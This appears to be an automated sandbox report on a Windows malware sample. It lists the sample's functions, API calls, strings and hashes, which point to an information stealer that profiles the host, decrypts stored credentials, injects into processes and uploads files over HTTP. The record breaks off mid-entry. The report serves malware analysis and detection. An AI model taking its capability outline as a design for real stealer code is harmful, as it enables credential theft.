Function 00425791 Relevance: 1.6, APIs: 1, Instructions: 77fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 00425867

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: d0c3902d2c9e9cb1fd2b666241de148cccdd80166b5fe0c4b1533d94ff945b62
Instruction ID: 3f61e3797538ea5b5e3beb9c8f2060108314d02d328e1f6e5641947ec37d7391
Opcode Fuzzy Hash: d0c3902d2c9e9cb1fd2b666241de148cccdd80166b5fe0c4b1533d94ff945b62
Instruction Fuzzy Hash: 2A2119766403189FC702DBAEDDC99997BF9EB896067040454E811E7362DB38EE06CB5C

Function 00425435 Relevance: 1.5, APIs: 1, Instructions: 28encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32 ref: 00425470

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 4dd443f83702cf8b6105b91fb563fa8455256e4d4e18ff175cdb6cf994c03a0b
Instruction ID: cb7de199661f286802a37fc83a51937b8a1f7836089c6c8bc93ee743049ff453
Opcode Fuzzy Hash: 4dd443f83702cf8b6105b91fb563fa8455256e4d4e18ff175cdb6cf994c03a0b
Instruction Fuzzy Hash: EBF0F9B19193028FC304DF28C694926BBE0FFC8644F018A5CA88897351D630EA84CB92

Function 0042D415 Relevance: 1.5, APIs: 1, Instructions: 25timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32 ref: 0042D449

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InformationTimeZone
String ID:
API String ID: 565725191-0
Opcode ID: 089269d245f97865d6e96952320cc961d4c70f0e88486dd6361ed9ce0b372ca4
Instruction ID: acbb689d5094415d14e2d0f19700c90219611dae1691e3ba05c5fb269b599d58
Opcode Fuzzy Hash: 089269d245f97865d6e96952320cc961d4c70f0e88486dd6361ed9ce0b372ca4
Instruction Fuzzy Hash: A5F08C7A204202EFC210EB39DD88F1937F8DB49315B060254E510873A5D23598909A41

Function 0043A05D Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 0043A075

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: DriveLogicalStrings
String ID:
API String ID: 2022863570-0
Opcode ID: f53968d5f1f20aef058b91a87f693c1575b2ead7a8cea7a33550002ea40b204e
Instruction ID: 7d19225c8a2454430cea6553673ffa21a311ce4f6cdfe318b69c579caed2de09
Opcode Fuzzy Hash: f53968d5f1f20aef058b91a87f693c1575b2ead7a8cea7a33550002ea40b204e
Instruction Fuzzy Hash: 68F06572E10205DFEB09CF64CC81FD9BBA2AB04344F14446EE602D7382EA30AA45CF80

Function 0042DF9F Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0042DFB5

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: bd1a9e4dd3e7876b304708ca0883e2b5306f9a8f12906da4c58e03e2591602ce
Instruction ID: 94d1152bbe3f1173c21cce2b822cec5dbf9eed480023797ab6e12cec23ae59db
Opcode Fuzzy Hash: bd1a9e4dd3e7876b304708ca0883e2b5306f9a8f12906da4c58e03e2591602ce
Instruction Fuzzy Hash: 51E08CB23402149BE7088F0CCC85F2533E1ABC8709F05092CBA42CB2A2F664DC008A2D

Function 004151EC Relevance: 1.5, APIs: 1, Instructions: 16filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,000007CF,?), ref: 004151FE

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 90f1e888241cb1ec3522784cd6b161d10e531bb1ef10c33bfda20f5565286229
Instruction ID: c505ba39ef20379c4645ff65d94c463da6b614d9bb8881772fb149c790f2d06d
Opcode Fuzzy Hash: 90f1e888241cb1ec3522784cd6b161d10e531bb1ef10c33bfda20f5565286229
Instruction Fuzzy Hash: C3E08C7160020A8FEB01CB64CC85DA5B776FF88348B1004A8E1159B365E772EC06CB00

Function 0043C8E6 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

c$, xrefs: 0043C8F4

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: c$
API String ID: 0-2531412009
Opcode ID: 82e2565ac35b3a0b447ca74fd8f845529af7dc38640e08d73f5c05abb39b2009
Instruction ID: 76f8c5f3ba02ff550ff9308846211c5ad4603f81bf3bed1e82a44f4a257194a3
Opcode Fuzzy Hash: 82e2565ac35b3a0b447ca74fd8f845529af7dc38640e08d73f5c05abb39b2009
Instruction Fuzzy Hash: 0941966440D1D05ACB26577A40D49A2BFE25EAF20DB2ED0CEE0D45E373C16BC947DB25

Function 00433DEF Relevance: 40.9, APIs: 1, Strings: 25, Instructions: 1853
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(00000000), ref: 00435448

Strings

Windows: , xrefs: 004344D7, 004344DD, 004344F3
Path: , xrefs: 0043433B, 00434341, 00434357
AV: , xrefs: 004346AC, 004346B2, 004346C8
Version: , xrefs: 00433E2C, 00433E32, 00433E4B
RAM: , xrefs: 0043500A, 00435010, 00435026
Processor: , xrefs: 00434D6D, 00434D73, 00434D89
[Software], xrefs: 004352DC, 004352E2, 004352F8
information.txt, xrefs: 0043547D, 00435483, 00435498, 0043549D
User Name: , xrefs: 00434881, 00434887, 0043489D
Display Resolution: , xrefs: 00434961, 00434967, 0043497F, 00434984
Install Date: , xrefs: 004345B6, 004345BC, 004345D2
HWID: , xrefs: 00434221, 00434227, 0043423D
[Processes], xrefs: 004351E6, 004351EC, 00435202
Keyboard Languages: , xrefs: 00434A5D, 00434A63, 00434A79
GUID: , xrefs: 0043412B, 00434131, 00434147
VideoCard: , xrefs: 004350E9, 004350EF, 00435105
TimeZone: , xrefs: 00434C32, 00434C38, 00434C4E
MachineID: , xrefs: 0043404C, 00434052, 00434068
Cores: , xrefs: 00434E4C, 00434E52, 00434E68
Local Time: , xrefs: 00434B53, 00434B59, 00434B6F
Work Dir: In memory, xrefs: 0043443E, 00434444, 0043445A
Date: , xrefs: 00433F6D, 00433F73, 00433F89
Threads: , xrefs: 00434F2B, 00434F31, 00434F47
Computer Name: , xrefs: 004347A2, 004347A8, 004347BE
[Hardware], xrefs: 00434D11, 00434D17, 00434D2D

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrlen
String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
API String ID: 1659193697-1014693891
Opcode ID: 2d5b23938c28d0a586785e9ce2f673269f8948ef176f9d383664fd4fba54a98b
Instruction ID: 34db55e01f5c8ab7ca91c860d828c47d7678525bac6b5c30a7ffb8d33252fe5a
Opcode Fuzzy Hash: 2d5b23938c28d0a586785e9ce2f673269f8948ef176f9d383664fd4fba54a98b
Instruction Fuzzy Hash: 74E2F7B5B02201AFC355EB5CECC59BAB7E5FF8C205B44006CF81AC7722CA68ED558B59

Function 0043D1D5 Relevance: 30.4, APIs: 7, Strings: 10, Instructions: 641
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(0065FB57), ref: 0043DC84
LoadLibraryA.KERNEL32(0065FB64), ref: 0043DCA7
LoadLibraryA.KERNEL32(0065FB6F), ref: 0043DCCA
LoadLibraryA.KERNEL32(0065FB7B), ref: 0043DCED
LoadLibraryA.KERNEL32(0065FBA2), ref: 0043DD56
LoadLibraryA.KERNEL32(0065FBAD), ref: 0043DD79
LoadLibraryA.KERNEL32(dbghelp.dll), ref: 0043DDBF

Strings

dbghelp.dll, xrefs: 0043DDB2, 0043DDB8, 0043DDBE
m&q9, xrefs: 0043DD96
VirtualAllocEx, xrefs: 0043DB68, 0043DB6E, 0043DB81
CreateProcessA, xrefs: 0043DA84, 0043DA8A, 0043DA9D
ResumeThread, xrefs: 0043DBB4, 0043DBBA, 0043DBCD
WriteProcessMemory, xrefs: 0043DC00, 0043DC06, 0043DC19
GetThreadContext, xrefs: 0043DAD0, 0043DAD6, 0043DAE9
SetThreadContext, xrefs: 0043DC4C, 0043DC52, 0043DC63
m&q9, xrefs: 0043D1E1
ReadProcessMemory, xrefs: 0043DB1C, 0043DB22, 0043DB35

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: LibraryLoad
String ID: CreateProcessA$GetThreadContext$ReadProcessMemory$ResumeThread$SetThreadContext$VirtualAllocEx$WriteProcessMemory$dbghelp.dll$m&q9$m&q9
API String ID: 1029625771-279033102
Opcode ID: 4f68f082125b678358cfba96fd582cef98a87372e4dcaa70b5914f3c3bc83993
Instruction ID: 24e71b90f7b2db1066770ddba542897ddfe30af0ad822bed4a36ffa38b3fd459
Opcode Fuzzy Hash: 4f68f082125b678358cfba96fd582cef98a87372e4dcaa70b5914f3c3bc83993
Instruction Fuzzy Hash: AE7278362067459FD308DF26DCE8D51BBA6FB8E30971442A9EA059736FF631A910DF08

Function 004147C9 Relevance: 27.0, APIs: 11, Strings: 4, Instructions: 797
stringmemorynetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(00000000,?,?,",?,?,file_data,?,build_id,?,",?,00660CAC,?,------), ref: 00414FCA
lstrlenA.KERNEL32(00000000,?,?,",?,?,file_data,?,build_id,?,",?,00660CAC,?,------), ref: 00414FEF
RtlAllocateHeap.NTDLL(00000000,00000000,00000000,?,?,",?,?,file_data,?,build_id,?,",?,00660CAC), ref: 00415013
memcpy.MSVCRT(00000000,00660CAC,00000000,?,?,",?,?,file_data,?,build_id,?,",?,00660CAC), ref: 0041505B
lstrlenA.KERNEL32(00000000,?,?,file_data,?,build_id,?,",?,00660CAC,?,------), ref: 00415086
memcpy.MSVCRT(00000000,?,?,?,?,file_data,?,build_id,?,",?,00660CAC,?,------), ref: 00415091
lstrlenA.KERNEL32(00000000,?,?,?,?,?,file_data,?,build_id,?,",?,00660CAC,?,------), ref: 004150BC
lstrlenA.KERNEL32(00000000,?,?,?,?,?,file_data,?,build_id,?,",?,00660CAC,?,------), ref: 004150F8
memcpy.MSVCRT(?,00660CAC,00000000,?,?,?,?,?,file_data,?,build_id,?,",?,00660CAC), ref: 004150FF
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,file_data,?,build_id,?,",?,00660CAC), ref: 0041513D
HttpSendRequestA.WININET(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,file_data,?,build_id), ref: 0041515E

Strings

build_id, xrefs: 00414B43, 00414B49, 00414B5F
------, xrefs: 00414804, 0041480A, 00414822, 00414827, 00414A4A, 00414A4F, 00414C54, 00414C59, 00414E33, 00414E38
", xrefs: 00414980, 00414986, 0041499B, 004149A0, 00414B98, 00414B9D, 00414D85, 00414D8A, 00414F81, 00414F86
file_data, xrefs: 00414F2C, 00414F32, 00414F48

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrlen$memcpy$AllocateHeapHttpRequestSend
String ID: "$------$build_id$file_data
API String ID: 2996894842-481700987
Opcode ID: 4cc6afd63a2352e420ade48c1fc2f85cad42bef2741cdeb8d9bf13fc92d6d66c
Instruction ID: 7e59a43fb92f708acd753c271b489475c7d4a1d1423ecfc975b3740fcb1c6fc3
Opcode Fuzzy Hash: 4cc6afd63a2352e420ade48c1fc2f85cad42bef2741cdeb8d9bf13fc92d6d66c
Instruction Fuzzy Hash: 6562E1353012109FD712DB6DEC85A6AF3FABF883467480479E816C7372CA25EE09CB58

Function 00416A5F Relevance: 14.6, APIs: 3, Strings: 5, Instructions: 638
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT(?,00000000,00000000), ref: 0041715A
memcpy.MSVCRT(00000000,?,00000000), ref: 004171D0
InternetReadFile.WININET(?,?,000000C7,?), ref: 00417251

Strings

build_id, xrefs: 00416DE5, 00416DEB, 00416E01
mode, xrefs: 00416FEF, 00416FF5, 0041700B
------, xrefs: 00416A99, 00416A9F, 00416AA0, 00416ABC, 00416CEC, 00416CF1, 00416EF6, 00416EFB
", xrefs: 00416C1E, 00416C24, 00416C39, 00416C3E, 00416E3A, 00416E3F, 00417044, 00417049
dU:lU:\U:, xrefs: 004171D8

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: memcpy$FileInternetRead
String ID: "$------$build_id$dU:lU:\U:$mode
API String ID: 2059747129-4215338564
Opcode ID: a076d046c773eaae75021768de4de57e91460f3f4f46ac38150c3be6442301ad
Instruction ID: fe4d41c36e3f85450e8ad071882540042e873538d42cdc3b7df480d0a4b406d1
Opcode Fuzzy Hash: a076d046c773eaae75021768de4de57e91460f3f4f46ac38150c3be6442301ad
Instruction Fuzzy Hash: 82324C753042108FC705CB5DED81EAAB7F6BFC824536500BAE855C7362DBA0ED26CB59

Function 004159EE Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 441
stringfilenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,",?,?,build_id,?,"), ref: 00415EE8
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,",?,?,build_id,?,"), ref: 00415F20
InternetReadFile.WININET(00660CAC,?,000007CF,?,?,?,?,?,?,?,?,?,",?,?,build_id), ref: 00415F5E

Strings

build_id, xrefs: 00415D81, 00415D87, 00415D9D
hwid, xrefs: 00415B63, 00415B69, 00415B7F
", xrefs: 00415BBF, 00415BC5, 00415BDB, 00415DD6, 00415DDB
------, xrefs: 00415A28, 00415A2E, 00415A46, 00415A4B, 00415C88, 00415C8D

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrlen$FileInternetRead
String ID: "$------$build_id$hwid
API String ID: 55632845-50533134
Opcode ID: e0d7cceb4d819f9284b24f4595ddcfb05509cb9f4bd70c7d53174018c756231b
